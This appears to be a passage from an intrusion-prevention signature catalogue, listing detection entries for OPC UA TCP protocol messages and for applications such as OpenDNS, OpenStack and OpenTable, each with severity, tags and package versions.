About this situation: An OPC UA TCP Browse request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_Browse-Response

About this situation: An OPC UA TCP Browse response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_BrowseNext-Request

About this situation: An OPC UA TCP BrowseNext request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_BrowseNext-Response

About this situation: An OPC UA TCP BrowseNext response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_Call-Request

About this situation: An OPC UA TCP Call request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_Call-Response

About this situation: An OPC UA TCP Call response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_Cancel-Request

About this situation: An OPC UA TCP Cancel request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_Cancel-Response

About this situation: An OPC UA TCP Cancel response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_CloseSecureChannel-Request

About this situation: An OPC UA TCP CloseSecureChannel request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_CloseSecureChannel-Response

About this situation: An OPC UA TCP CloseSecureChannel response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_CloseSession-Request

About this situation: An OPC UA TCP CloseSession request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_CloseSession-Response

About this situation: An OPC UA TCP CloseSession response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_CreateMonitoredItems-Request

About this situation: An OPC UA TCP CreateMonitoredItems request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_CreateMonitoredItems-Response

About this situation: An OPC UA TCP CreateMonitoredItems response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_CreateSession-Request

About this situation: An OPC UA TCP CreateSession request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_CreateSession-Response

About this situation: An OPC UA TCP CreateSession response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_CreateSubscription-Request

About this situation: An OPC UA TCP CreateSubscription request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_CreateSubscription-Response

About this situation: An OPC UA TCP CreateSubscription response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_DeleteMonitoredItems-Request

About this situation: An OPC UA TCP DeleteMonitoredItems request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_DeleteMonitoredItems-Response

About this situation: An OPC UA TCP DeleteMonitoredItems response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_DeleteNodes-Request

About this situation: An OPC UA TCP DeleteNodes request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_DeleteNodes-Response

About this situation: An OPC UA TCP DeleteNodes response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_DeleteReferences-Request

About this situation: An OPC UA TCP DeleteReferences request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_DeleteReferences-Response

About this situation: An OPC UA TCP DeleteReferences response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_DeleteSubscriptions-Request

About this situation: An OPC UA TCP DeleteSubscriptions request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_DeleteSubscriptions-Response

About this situation: An OPC UA TCP DeleteSubscriptions response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_FindServers-Request

About this situation: An OPC UA TCP FindServers request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_FindServers-Response

About this situation: An OPC UA TCP FindServers response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_GetEndpoints-Request

About this situation: An OPC UA TCP GetEndpoints request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_GetEndpoints-Response

About this situation: An OPC UA TCP GetEndpoints response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_HistoryRead-Request

About this situation: An OPC UA TCP HistoryRead request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_HistoryRead-Response

About this situation: An OPC UA TCP HistoryRead response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_HistoryUpdate-Request

About this situation: An OPC UA TCP HistoryUpdate request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_HistoryUpdate-Response

About this situation: An OPC UA TCP HistoryUpdate response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_ModifyMonitoredItems-Request

About this situation: An OPC UA TCP ModifyMonitoredItems request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_ModifyMonitoredItems-Response

About this situation: An OPC UA TCP ModifyMonitoredItems response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_ModifySubscription-Request

About this situation: An OPC UA TCP ModifySubscription request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_ModifySubscription-Response

About this situation: An OPC UA TCP ModifySubscription response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_OpenSecureChannel-Request

About this situation: An OPC UA TCP OpenSecureChannel request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_OpenSecureChannel-Response

About this situation: An OPC UA TCP OpenSecureChannel response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_Publish-Request

About this situation: An OPC UA TCP Publish request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_Publish-Response

About this situation: An OPC UA TCP Publish response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_QueryFirst-Request

About this situation: An OPC UA TCP QueryFirst request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_QueryFirst-Response

About this situation: An OPC UA TCP QueryFirst response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_QueryNext-Request

About this situation: An OPC UA TCP QueryNext request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_QueryNext-Response

About this situation: An OPC UA TCP QueryNext response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_Read-Request

About this situation: An OPC UA TCP Read request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_Read-Response

About this situation: An OPC UA TCP Read response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_RegisterNodes-Request

About this situation: An OPC UA TCP RegisterNodes request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_RegisterNodes-Response

About this situation: An OPC UA TCP RegisterNodes response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_RegisterServer-Request

About this situation: An OPC UA TCP RegisterServer request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_RegisterServer-Response

About this situation: An OPC UA TCP RegisterServer response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_Republish-Request

About this situation: An OPC UA TCP Republish request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_Republish-Response

About this situation: An OPC UA TCP Republish response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_Request-Unknown-Service

About this situation: An OPC UA TCP request to an unknown service detected
Context: OPC UA TCP Normalized Request
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_Response-Unknown-Service

About this situation: An OPC UA TCP response with an unknown detected
Context: OPC UA TCP Normalized Response
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_ServiceFault

About this situation: An OPC UA TCP ServiceFault detected
Context: OPC UA TCP Normalized Response
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies
First detected in: sgpkg-ips-630-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_SetMonitoringMode-Request

About this situation: An OPC UA TCP SetMonitoringMode request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_SetMonitoringMode-Response

About this situation: An OPC UA TCP SetMonitoringMode response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_SetPublishingMode-Request

About this situation: An OPC UA TCP SetPublishingMode request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_SetPublishingMode-Response

About this situation: An OPC UA TCP SetPublishingMode response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_SetTriggering-Request

About this situation: An OPC UA TCP SetTriggering request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_SetTriggering-Response

About this situation: An OPC UA TCP SetTriggering response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_TestStack-Request

About this situation: An OPC UA TCP TestStack request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_TestStack-Response

About this situation: An OPC UA TCP TestStack response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_TestStackEx-Request

About this situation: An OPC UA TCP TestStackEx request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_TestStackEx-Response

About this situation: An OPC UA TCP TestStackEx response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_TransferSubscriptions-Request

About this situation: An OPC UA TCP TransferSubscriptions request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_TransferSubscriptions-Response

About this situation: An OPC UA TCP TransferSubscriptions response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_TranslateBrowsePathsToNodeIds-Request

About this situation: An OPC UA TCP TranslateBrowsePathsToNodeIds request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_TranslateBrowsePathsToNodeIds-Response

About this situation: An OPC UA TCP TranslateBrowsePathsToNodeIds response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_UnregisterNodes-Request

About this situation: An OPC UA TCP UnregisterNodes request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_UnregisterNodes-Response

About this situation: An OPC UA TCP UnregisterNodes response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_Write-Request

About this situation: An OPC UA TCP Write request detected
Context: OPC UA TCP Normalized Request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

OPC-UA-TCP_Write-Response

About this situation: An OPC UA TCP Write response detected
Context: OPC UA TCP Normalized Response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Open-E-DSS-V7

About this situation: Application Open-E-DSS-V7 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Open-E Data Storage Software V7 is being increasingly used as the go-to software for cloud storage.
Back to top

Open-Hub

About this situation: Application Open-Hub detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Open Hub is an open source directory that can be edit. It features comprehensive metrics and analysis on open source projects.
Back to top

Open-Webmail

About this situation: Open WebMail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Mail, Application Routing
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-623-5211
Description: Open WebMail is a HTTP CGI webmail system written in Perl. It can inter-operate with email back-end using SMTP and POP3.
Back to top

Open-Xchange

About this situation: Application Open-Xchange detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Open-Xchange develops, markets and sells web-based communication, collaboration and office productivity software, which enables full integration of email, documents, scheduling and social media.
Back to top

OpenAI

About this situation: OpenAI usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1793-5242
Last changed: sgpkg-ips-1793-5242
Description: OpenAI is an artificial intelligence research organization.
Back to top

OpenAir

About this situation: Application OpenAir detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OpenAir provides Web based professional services automation software (PSA) for services organizations to handle project management, resource management, knowledge management, project accounting, time and expense tracking and billing.
Back to top

OpenBillingSystem

About this situation: Application OpenBillingSystem detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OBS is a convergent Billing Platform for IPTV, OTT, TV-Anywhere, Pay-TV, DTH, DTT, ISP, Wifi.
Back to top

Openbravo

About this situation: Application Openbravo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Openbravo is a provider of commercial open source software space helping midsize and large specialty retailers to manage continuous business change and innovation in today's fast-changing retail industry.
Back to top

Openbridge

About this situation: Application Openbridge detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Openbridge provide data logistics platform. Openbridge manage the real-time flow of consumer data, big or small, delivering it exactly where it needs to be in order to create value for your customers.
Back to top

OpenCart

About this situation: Application OpenCart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Opencart is an open source shopping cart for web e-commerce that supports a wide range of capabilities.
Back to top

OpenClipart

About this situation: Application OpenClipart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OpenClipart is a service that provides non-commercial use on cards, books, crafts, fashion, merchandise, and services.
Back to top

OpenDNS

About this situation: Endpoint Context Agent based OpenDNS detection
Context: EI Correlation
Severity: 1
Tags: Security, Endpoint
First detected in: sgpkg-ips-1147-5242
Last changed: sgpkg-ips-1147-5242
Description: OpenDNS endpoint application has been detected. OpenDNS, or Cisco DNS Proxy, is a service which adds features such as phishing protection and content filtering capability to DNS.
Back to top

OpenDNS

About this situation: OpenDNS usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: OpenDNS extends the Domain Name System (DNS) by adding features such as misspelling correction, phishing protection, and optional content filtering.
Back to top

OpenDrive

About this situation: OpenDrive usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-565-5211
Last changed: sgpkg-ips-629-5211
Description: OpenDrive is an online storage, backup and cloud content management service that helps users to store, share and backup files.
Back to top

OpenHallway

About this situation: Application OpenHallway detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OpenHallway allows you to record a users screen and voice as they use your website so you can learn what they like, what they hate, and why they leave.
Back to top

Openprovider

About this situation: Application Openprovider detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Openprovider offers automated domain name management, domain extensions, selection of SSL Certificates and Plesk licenses.
Back to top

Openshift

About this situation: Application Openshift detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OpenShift provides the tools to develop, host and scale apps in the public or private cloud.
Back to top

OpenSIS

About this situation: Application OpenSIS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: openSIS is user friendly open source student information system. It is also a full scale school management and administrative system supporting K-12 and higher education needs.
Back to top

OpenSpan

About this situation: Application OpenSpan detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OpenSpan is a desktop automation and analytics tools platform that helps improve the productivity of frontline and back office workers.
Back to top

OpenStack

About this situation: Application OpenStack detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: OpenStack provides the ubiquitous Open Source Cloud Computing platform that meet the needs of public and private clouds regardless of size.
Back to top

OpenStreetMap

About this situation: OpenStreetMap usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Orienteering, Application Routing
First detected in: sgpkg-ips-576-5211
Last changed: sgpkg-ips-754-5211
Description: OpenStreetMap is a web-based map service.
Back to top

Opentable

About this situation: OpenTable usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: OpenTable allows to make online reservations, read restaurant reviews from diners, and earn points towards free meals.
Back to top

OpenText

About this situation: Application OpenText detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
